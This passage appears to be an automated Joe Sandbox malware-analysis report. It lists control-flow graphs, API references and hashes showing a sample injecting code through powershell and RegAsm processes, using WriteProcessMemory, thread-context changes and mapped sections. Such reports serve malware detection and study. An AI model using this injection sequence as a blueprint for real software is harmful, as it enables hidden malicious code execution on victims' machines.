1073->1072 1085->1086 1087 1b77491 1085->1087 1088 1b7749f-1b774a3 1086->1088 1089 1b774ad-1b774b1 1086->1089 1087->1086 1088->1089 1092 1b774a5 1088->1092 1090 1b774b3-1b774b7 1089->1090 1091 1b774c1-1b774c5 1089->1091 1090->1091 1093 1b774b9 1090->1093 1094 1b774c7-1b774f0 1091->1094 1095 1b774fb-1b77506 1091->1095 1092->1089 1093->1091 1094->1095 1099 1b77507 1095->1099 1099->1099
                                  APIs
                                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 01B7737F
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.461263729.0000000001B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_1b70000_powershell.jbxd
                                  Similarity
                                  • API ID: CreateProcess
                                  • String ID:
                                  • API String ID: 963392458-0
                                  • Opcode ID: 9e6a3006f502d252179e2f5554c30ff15861af8e09538173fa266d36c968793a
                                  • Instruction ID: dd11569738181c867e699ae87cf8477b1bb597980fc03a0ba7fd4184151e45f5
                                  • Opcode Fuzzy Hash: 9e6a3006f502d252179e2f5554c30ff15861af8e09538173fa266d36c968793a
                                  • Instruction Fuzzy Hash: D6C12571D002198FDB25CFA8C845BEEBBB1BF09304F0095A9D969B7250DB749A85CF94

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1100 1b76d18-1b76d8b 1103 1b76da2-1b76e09 WriteProcessMemory 1100->1103 1104 1b76d8d-1b76d9f 1100->1104 1106 1b76e12-1b76e64 1103->1106 1107 1b76e0b-1b76e11 1103->1107 1104->1103 1107->1106
                                  APIs
                                  • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 01B76DF3
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.461263729.0000000001B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_1b70000_powershell.jbxd
                                  Similarity
                                  • API ID: MemoryProcessWrite
                                  • String ID:
                                  • API String ID: 3559483778-0
                                  • Opcode ID: 5c9f79fb9bd5da92e706c2b64955d44d703e8fe694ed6603ece96089ec592efb
                                  • Instruction ID: 30646ff73c848e9dfad0c480b2bf0c28388d9748ea38f50b105a178a044459f3
                                  • Opcode Fuzzy Hash: 5c9f79fb9bd5da92e706c2b64955d44d703e8fe694ed6603ece96089ec592efb
                                  • Instruction Fuzzy Hash: FC41ABB5D002489FDF04CFA9D984AEEFBF1BB49314F24942AE818B7250D735AA45CF64
                                  APIs
                                  • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 01B76DF3
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.461263729.0000000001B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_1b70000_powershell.jbxd
                                  Similarity
                                  • API ID: MemoryProcessWrite
                                  • String ID:
                                  • API String ID: 3559483778-0
                                  • Opcode ID: cc589b464cfe26e0cfe3b41e144afb91273972dc76d956403e09afeac5898616
                                  • Instruction ID: 70ae4b767b52b6cea24b99e9cc9e8407f462a98489b247763922f3210dbcfa17
                                  • Opcode Fuzzy Hash: cc589b464cfe26e0cfe3b41e144afb91273972dc76d956403e09afeac5898616
                                  • Instruction Fuzzy Hash: 4541AAB5D002489FDF04CFA9D984AEEFBF1BB49314F24942AE818B7250D334AA45CF64
                                  APIs
                                  • Wow64SetThreadContext.KERNEL32(?,?), ref: 01B76B77
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.461263729.0000000001B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_1b70000_powershell.jbxd
                                  Similarity
                                  • API ID: ContextThreadWow64
                                  • String ID:
                                  • API String ID: 983334009-0
                                  • Opcode ID: 7fa88e3e61d057f868cec311cadde0ee9a73cc69edabc78ebe3c3ba322e10407
                                  • Instruction ID: 50e6c3279ef0cc79e8646707ea7b974336a01bcdfdfab0563e62e986983b2a6f
                                  • Opcode Fuzzy Hash: 7fa88e3e61d057f868cec311cadde0ee9a73cc69edabc78ebe3c3ba322e10407
                                  • Instruction Fuzzy Hash: 4241BCB4D002589FDB14CFAAD984AEEFBB1AF49314F24802AE418B7240D738A949CF54
                                  APIs
                                  • Wow64SetThreadContext.KERNEL32(?,?), ref: 01B76B77
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.461263729.0000000001B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_1b70000_powershell.jbxd
                                  Similarity
                                  • API ID: ContextThreadWow64
                                  • String ID:
                                  • API String ID: 983334009-0
                                  • Opcode ID: b6e09e5eae4ae4097d43b533ef07d37c128981103b6097acc9bea6c400220909
                                  • Instruction ID: 58c331ca59911c006640033401b2b31985388da71e78ece8e84123227fbe7224
                                  • Opcode Fuzzy Hash: b6e09e5eae4ae4097d43b533ef07d37c128981103b6097acc9bea6c400220909
                                  • Instruction Fuzzy Hash: 4941ACB5D002589FDF14CFAAD985AEEFBF1AB49314F14842AE418B7340D738A949CF54
                                  APIs
                                  • ResumeThread.KERNELBASE(?), ref: 01B76A56
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.461263729.0000000001B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_1b70000_powershell.jbxd
                                  Similarity
                                  • API ID: ResumeThread
                                  • String ID:
                                  • API String ID: 947044025-0
                                  • Opcode ID: ebe61cca37d309b621e14f2293867378d72f5931cb5f70e0b673687da13c67ff
                                  • Instruction ID: 335b2b40512f3a65834982a0c5c7cd85562c32024879edae868c98b28fdc1a3d
                                  • Opcode Fuzzy Hash: ebe61cca37d309b621e14f2293867378d72f5931cb5f70e0b673687da13c67ff
                                  • Instruction Fuzzy Hash: 7431C8B4D002589BCF14CFAAD984AAEFBB5AF49314F24946AE814B7300D735A905CFA4
                                  APIs
                                  • ResumeThread.KERNELBASE(?), ref: 01B76A56
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.461263729.0000000001B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_1b70000_powershell.jbxd
                                  Similarity
                                  • API ID: ResumeThread
                                  • String ID:
                                  • API String ID: 947044025-0
                                  • Opcode ID: 012909fa59a8e5f8835ed8cfd5986ea529a85309dba60d87e677367b62baf523
                                  • Instruction ID: 0ca7de44e054814cd0b40eb717a8993ba6c9309462aed288950336f47389a5e2
                                  • Opcode Fuzzy Hash: 012909fa59a8e5f8835ed8cfd5986ea529a85309dba60d87e677367b62baf523
                                  • Instruction Fuzzy Hash: 2531BAB4D002189FCF14CFAAD984AAEFBB5EF49314F14946AE814B7300C735A905CFA4
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.460988079.000000000022D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0022D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_22d000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a8c7d4a3d66681a127075b52764f6cb756568fa0d15efb186f7176973f610ebb
                                  • Instruction ID: 8e3986ab9079a91dc350a1d71dd13be2e276d0bb8e041295d2fd8c39e9ce3a09
                                  • Opcode Fuzzy Hash: a8c7d4a3d66681a127075b52764f6cb756568fa0d15efb186f7176973f610ebb
                                  • Instruction Fuzzy Hash: 5601697144D3D0AFD7124B259C947A2BFA4DF43724F1984DBE8848F2A7C2689C49CB72
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.460988079.000000000022D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0022D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_22d000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e940df33c1381ad3bad33f782715b7ccab09baae8b0117d0655f380da0ba3556
                                  • Instruction ID: 53386bd419cdf6a7ed2cad7203f56c4728f425be60c537a798c47f52c29f5d13
                                  • Opcode Fuzzy Hash: e940df33c1381ad3bad33f782715b7ccab09baae8b0117d0655f380da0ba3556
                                  • Instruction Fuzzy Hash: 06012B71514350BAE7104E55DCC4B67BFD8DF41724F18C41AEC444F296C2B9DD45CAB1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.461295147.0000000001CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_1ca0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4'p$4'p$@#8g$@#8g$$p$$p$$p
                                  • API String ID: 0-3780591650
                                  • Opcode ID: ea99f8bcea4cdaf117766cc57d03f2a19d753829a285dc80a771d93295ff3f4d
                                  • Instruction ID: 0b36b57acc39ab6b95ba322a600b299a9b246812b0fcfd853ceb4959312378b8
                                  • Opcode Fuzzy Hash: ea99f8bcea4cdaf117766cc57d03f2a19d753829a285dc80a771d93295ff3f4d
                                  • Instruction Fuzzy Hash: 4441E435700322DFDB2A8E2DC44066ABFF6AFC6614FE8846AD914CB251DB71CA41C761
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.461295147.0000000001CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_1ca0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4'p$4'p$@#8g$@#8g$$p$$p$$p
                                  • API String ID: 0-3780591650
                                  • Opcode ID: d07381ccb559d4c7732754300d28fa5138ec686d7327b9db19d291fd317ed90e
                                  • Instruction ID: 131b683824c09b676df66b3bb748e0ca3a0a9331387de106f42308911b189b92
                                  • Opcode Fuzzy Hash: d07381ccb559d4c7732754300d28fa5138ec686d7327b9db19d291fd317ed90e
                                  • Instruction Fuzzy Hash: B941C535B00222DFDB2A8E6DC56466ABBF1BFC4218FA4C07AC586C7251DB31CA45C791
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.461295147.0000000001CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_1ca0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @#8g$@#8g$L4p$L4p$L4p
                                  • API String ID: 0-2430354616
                                  • Opcode ID: 5fbbd04e7af2f57a6e4b0faae4cf1f6c6822bcd65e4a7a865e46687fd21752ad
                                  • Instruction ID: dd17a0e2511d670ade02fce6497cb629980220181e5355340602d846d8846a01
                                  • Opcode Fuzzy Hash: 5fbbd04e7af2f57a6e4b0faae4cf1f6c6822bcd65e4a7a865e46687fd21752ad
                                  • Instruction Fuzzy Hash: 89615634B00245EFEB268E68C450BAE7FB2AFC8354F54806AF9058B291CB75DE51C792
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.461295147.0000000001CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_1ca0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @#8g$@#8g$L4p$L4p$L4p
                                  • API String ID: 0-2430354616
                                  • Opcode ID: e767c60eb5ce73b85568806b1b9338a88b4dd7642f466e81f9f45e6daad01c3c
                                  • Instruction ID: 80ca9f4af90b0c81ce92ba68343585be19e2469fdbb32c7273b557062d304fd7
                                  • Opcode Fuzzy Hash: e767c60eb5ce73b85568806b1b9338a88b4dd7642f466e81f9f45e6daad01c3c
                                  • Instruction Fuzzy Hash: A9514835700245EFEB268E6CC450B7E7BB2BF84344F588066F9058B292CB71DE51C752
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.461295147.0000000001CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_1ca0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @#8g$@#8g$L4p$L4p$L4p
                                  • API String ID: 0-2430354616
                                  • Opcode ID: f4785e625ea4f7cd674f5e8c31fe13e6007361399f1209b5cba2d7ae0092606f
                                  • Instruction ID: c5ebb04e37b70bcb0f03f31e08b6c5d5b308f8005485f6c52f2a302dbe9ed811
                                  • Opcode Fuzzy Hash: f4785e625ea4f7cd674f5e8c31fe13e6007361399f1209b5cba2d7ae0092606f
                                  • Instruction Fuzzy Hash: 93515A35700309EFEF268E6CC450BAE7BA2AFC5355F548025FA059B291CB71DE51CB51
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.461295147.0000000001CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_1ca0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @#8g$@#8g$$p$$p$$p
                                  • API String ID: 0-786965104
                                  • Opcode ID: a5341aab5a6f63d794d03553561c60799d61b4d78a64c152c7983aeb02fe67d1
                                  • Instruction ID: 9d3ba68e4d18834119ae9f4eb8fab1000a38db905ce1a8e8d3e9eec1276177fa
                                  • Opcode Fuzzy Hash: a5341aab5a6f63d794d03553561c60799d61b4d78a64c152c7983aeb02fe67d1
                                  • Instruction Fuzzy Hash: 0F516735704222DFDB268A6D880076AFFE6AFC5214FA8846BDA44CB251CB71D941C3A2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.461295147.0000000001CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_1ca0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @#8g$@#8g$L4p$L4p$L4p
                                  • API String ID: 0-2430354616
                                  • Opcode ID: 3132458a376fc8394ad36b55498998aa30bf97e1eae70824e3356731e9959b51
                                  • Instruction ID: a44697ae1619424d3006153a83397b271b28df63944f85096a315b2ecb0b7101
                                  • Opcode Fuzzy Hash: 3132458a376fc8394ad36b55498998aa30bf97e1eae70824e3356731e9959b51
                                  • Instruction Fuzzy Hash: 56517E35700266EFDB1A8E6CC840B7E7BA6AF88315F544065DA55CF291CB71CE81C791
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.461295147.0000000001CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_1ca0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @#8g$$p$$p$$p$$p
                                  • API String ID: 0-3139484670
                                  • Opcode ID: 12170e6f87329655dfe2eacf1f6537aeca9bd8dd210841217e13ed131b593c97
                                  • Instruction ID: d6839fb48a556290727163340d4fd97bc2ef3c961cd82d68d26045816c8766b1
                                  • Opcode Fuzzy Hash: 12170e6f87329655dfe2eacf1f6537aeca9bd8dd210841217e13ed131b593c97
                                  • Instruction Fuzzy Hash: 4E21D5B5A00307DFEB328E5DE94177ABBE5AF90618F9C406AD91487A01F771C641CB91
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.461295147.0000000001CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_1ca0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4'p$4'p$@#8g$@#8g
                                  • API String ID: 0-2879987117
                                  • Opcode ID: 72e4e7fd584a232af7485e11d368a213b9d981f560f07f4eb9205fa63b5a7140
                                  • Instruction ID: e1132e263aa5fbc4f4cf5ddb9374d03e362588e86c1311ca65c9c236837a438a
                                  • Opcode Fuzzy Hash: 72e4e7fd584a232af7485e11d368a213b9d981f560f07f4eb9205fa63b5a7140
                                  • Instruction Fuzzy Hash: A7414830B00216DFDB2BCF2DD055AAABBE2EF85314F94C06AC45A8B651DB31CE41CB51
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.461295147.0000000001CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_1ca0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @#8g$L4p$L4p$L4p
                                  • API String ID: 0-1538257442
                                  • Opcode ID: a369e2bcc00d442fa55015bbd9dd620368c25e13d6d98ba5a316ab2108c71fd4
                                  • Instruction ID: f02e5abc96e26a08d608f7ca87a249dd6951a10d123d2f4873cf0f22a734cd27
                                  • Opcode Fuzzy Hash: a369e2bcc00d442fa55015bbd9dd620368c25e13d6d98ba5a316ab2108c71fd4
                                  • Instruction Fuzzy Hash: 8E41383460434AEFDF238E58C4507AD7FB2AF41345F898166F9449B2A2C770DD95CB52
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.461295147.0000000001CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_1ca0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @#8g$L4p$L4p$L4p
                                  • API String ID: 0-1538257442
                                  • Opcode ID: cb0c61f6f940f5cca592cbec4b8a21afd1a7153564fb4352863fc85ade1ad84c
                                  • Instruction ID: 822f81c00a694d7975402c90e167cec820a03279a9cb32b920f353e6543a1180
                                  • Opcode Fuzzy Hash: cb0c61f6f940f5cca592cbec4b8a21afd1a7153564fb4352863fc85ade1ad84c
                                  • Instruction Fuzzy Hash: 7C412C34A00346EFEF268E68C4447BE7FB2AF84394F488066F9049B2A1C774DD55CB92
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.461295147.0000000001CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_1ca0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @#8g$L4p$L4p$L4p
                                  • API String ID: 0-1538257442
                                  • Opcode ID: b274d4a91c992577b7026ef0d0ab83d2e32189d120858f35a5e8f0c2330c1009
                                  • Instruction ID: 23fb1fc6661928efe3708e3401bb18b074e6c9330d1a2d242ace3d2673c1b163
                                  • Opcode Fuzzy Hash: b274d4a91c992577b7026ef0d0ab83d2e32189d120858f35a5e8f0c2330c1009
                                  • Instruction Fuzzy Hash: 46412E3560120AEFDF26CE58C4507BE7BB2BF84394F888025F9195B291C774DEA5CB52
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.461295147.0000000001CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_1ca0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4'p$@#8g$$p$$p
                                  • API String ID: 0-461818845
                                  • Opcode ID: 40d4c31a30c93cb13b0f5c7e16049bad34dbdd36f711a6cf6e2bf02e5944217d
                                  • Instruction ID: ec98189886d0a32353ae4d0915969807fbde284c3f635782575e222183afadf6
                                  • Opcode Fuzzy Hash: 40d4c31a30c93cb13b0f5c7e16049bad34dbdd36f711a6cf6e2bf02e5944217d
                                  • Instruction Fuzzy Hash: 70315830605327DFDB278F1DC54066ABFF8AF82618FD981AADD049B162D7B0DA40CB61
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.461295147.0000000001CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_1ca0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4'p$@#8g$$p$$p
                                  • API String ID: 0-461818845
                                  • Opcode ID: 457e18f2de25b85248e184ff3b403e8e8b364c7be5f4815276e1e54529d8e991
                                  • Instruction ID: 793e4b7338fdd4152ee81300041795e7ea864d2bc7a6627cf7058f346577bab3
                                  • Opcode Fuzzy Hash: 457e18f2de25b85248e184ff3b403e8e8b364c7be5f4815276e1e54529d8e991
                                  • Instruction Fuzzy Hash: 98218030A00227DFDF2ACE1EC554A69BBF1FB88219F98806AD59687111D770CA81CB92
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.461295147.0000000001CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_1ca0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4'p$@#8g$$p$$p
                                  • API String ID: 0-461818845
                                  • Opcode ID: a8f34040c4822b90035f0cf535e2da8a8e391f67cfe86f5ba9393fa60c7b844d
                                  • Instruction ID: 6bd30c6d93fa2c5246167c0585016e8347dfab8b5e1a40a9a69b61b7c7683e3e
                                  • Opcode Fuzzy Hash: a8f34040c4822b90035f0cf535e2da8a8e391f67cfe86f5ba9393fa60c7b844d
                                  • Instruction Fuzzy Hash: E1216F70A00227DFDF3ACF19C564A6ABBF1FF98218F98816AD59687111D770CA81CB51
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.461295147.0000000001CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_1ca0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4'p$4'p$$p$$p
                                  • API String ID: 0-377911355
                                  • Opcode ID: 7135fd94649f4aaf1bfd4f46168f61073dd5c887c476b591afd4f8e199a28fa1
                                  • Instruction ID: 5230f19c3a2e9968c24f10338d5f8b98b9b578f791c4b10f4da85ea3473892f6
                                  • Opcode Fuzzy Hash: 7135fd94649f4aaf1bfd4f46168f61073dd5c887c476b591afd4f8e199a28fa1
                                  • Instruction Fuzzy Hash: A0F0E934B005129FD32E155D6020269EFD36BC42E5BF4412AE545CB304DD74CD638BD6

                                  Execution Graph

                                  Execution Coverage:8%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:46.7%
                                  Total number of Nodes:60
                                  Total number of Limit Nodes:1
                                  execution_graph 1992 402d65 1994 402d69 1992->1994 1993 4018a6 8 API calls 1995 402ea5 1993->1995 1994->1993 1994->1995 2000 401706 2001 4016ea 2000->2001 2003 401789 2001->2003 2004 4017b4 2003->2004 2007 40328d 2004->2007 2006 4017e8 2006->2001 2009 40323d 2007->2009 2010 40327d 2007->2010 2008 4032a1 Sleep 2008->2009 2009->2007 2009->2008 2009->2010 2010->2006 2096 4018b1 2097 401903 2096->2097 2099 4018b5 2096->2099 2098 4014bf 7 API calls 2097->2098 2101 40191a 2097->2101 2098->2101 2100 4018ee Sleep 2099->2100 2100->2097 2039 4014d6 2040 4014c4 2039->2040 2041 40156f NtDuplicateObject 2040->2041 2050 40168b 2040->2050 2042 40158c NtCreateSection 2041->2042 2041->2050 2043 4015b2 NtMapViewOfSection 2042->2043 2044 40160c NtCreateSection 2042->2044 2043->2044 2045 4015d5 NtMapViewOfSection 2043->2045 2046 401638 2044->2046 2044->2050 2045->2044 2048 4015f3 2045->2048 2047 401642 NtMapViewOfSection 2046->2047 2046->2050 2049 401669 NtMapViewOfSection 2047->2049 2047->2050 2048->2044 2049->2050 1970 402dfe 1971 402dee 1970->1971 1973 402ea5 1971->1973 1974 4018a6 1971->1974 1975 4018b7 1974->1975 1976 4018ee Sleep 1975->1976 1977 401903 1976->1977 1979 40191a 1977->1979 1980 4014bf 1977->1980 1979->1973 1981 4014ce 1980->1981 1982 40156f NtDuplicateObject 1981->1982 1984 40168b 1981->1984 1983 40158c NtCreateSection 1982->1983 1982->1984 1985 4015b2 NtMapViewOfSection 1983->1985 1986 40160c NtCreateSection 1983->1986 1984->1979 1985->1986 1987 4015d5 NtMapViewOfSection 1985->1987 1986->1984 1988 401638 1986->1988 1987->1986 1990 4015f3 1987->1990 1988->1984 1989 401642 NtMapViewOfSection 1988->1989 1989->1984 1991 401669 NtMapViewOfSection 1989->1991 1990->1986 1991->1984 2102 4018be 2103 4018b7 2102->2103 2104 4018ee Sleep 2103->2104 2105 401903 2104->2105 2106 4014bf 7 API calls 2105->2106 2107 40191a 2105->2107 2106->2107 2108 4016be 2109 4016d3 2108->2109 2110 401789 Sleep 2109->2110 2110->2109

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 0 4014d6-4014d7 1 4014c4-4014c8 0->1 2 4014d8-401519 call 401164 0->2 1->2 13 40151b 2->13 14 40151e-401523 2->14 13->14 16 401529-40153a 14->16 17 40184d-401855 14->17 20 401540-401569 16->20 21 40184b 16->21 17->14 22 40185a-401883 17->22 20->21 31 40156f-401586 NtDuplicateObject 20->31 21->22 29 401874-40187f 22->29 30 401886-4018a3 call 401164 22->30 29->30 31->21 32 40158c-4015b0 NtCreateSection 31->32 34 4015b2-4015d3 NtMapViewOfSection 32->34 35 40160c-401632 NtCreateSection 32->35 34->35 37 4015d5-4015f1 NtMapViewOfSection 34->37 35->21 39 401638-40163c 35->39 37->35 42 4015f3-401609 37->42 39->21 41 401642-401663 NtMapViewOfSection 39->41 41->21 44 401669-401685 NtMapViewOfSection 41->44 42->35 44->21 45 40168b call 401690 44->45
                                  APIs
                                  • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015CE
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.473707932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Similarity
                                  • API ID: Section$CreateDuplicateObjectView
                                  • String ID:
                                  • API String ID: 1652636561-0
                                  • Opcode ID: afa16a46a3e1c62dd3975b49d68645ed763654774106451467306ab0cf294d30
                                  • Instruction ID: b0857a4fb145544e41851af17f16183f6357fb9efc2fe45eaf6198d87de3a54a
                                  • Opcode Fuzzy Hash: afa16a46a3e1c62dd3975b49d68645ed763654774106451467306ab0cf294d30
                                  • Instruction Fuzzy Hash: 8681E171600248BBDB218FA5DC88FEB7FB8FF86710F10416AF951BA1E5D6749901CB64

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 48 4014bf-4014c8 49 4014d8 48->49 50 4014ce-401519 call 401164 48->50 49->50 60 40151b 50->60 61 40151e-401523 50->61 60->61 63 401529-40153a 61->63 64 40184d-401855 61->64 67 401540-401569 63->67 68 40184b 63->68 64->61 69 40185a-401883 64->69 67->68 78 40156f-401586 NtDuplicateObject 67->78 68->69 76 401874-40187f 69->76 77 401886-4018a3 call 401164 69->77 76->77 78->68 79 40158c-4015b0 NtCreateSection 78->79 81 4015b2-4015d3 NtMapViewOfSection 79->81 82 40160c-401632 NtCreateSection 79->82 81->82 84 4015d5-4015f1 NtMapViewOfSection 81->84 82->68 86 401638-40163c 82->86 84->82 89 4015f3-401609 84->89 86->68 88 401642-401663 NtMapViewOfSection 86->88 88->68 91 401669-401685 NtMapViewOfSection 88->91 89->82 91->68 92 40168b call 401690 91->92
                                  APIs
                                  • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015CE
                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015EC
                                  • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040162D
                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 0040165E
                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401680
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.473707932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Similarity
                                  • API ID: Section$View$Create$DuplicateObject
                                  • String ID:
                                  • API String ID: 1546783058-0
                                  • Opcode ID: 6f051ce4ba6575236144a0128aa406b27f07ac02e786d19381c723ae0cf33ce2
                                  • Instruction ID: cb32da509904316ed93400f6898fa9d135e0c3db95e2781c81c9f365a62fd76c
                                  • Opcode Fuzzy Hash: 6f051ce4ba6575236144a0128aa406b27f07ac02e786d19381c723ae0cf33ce2
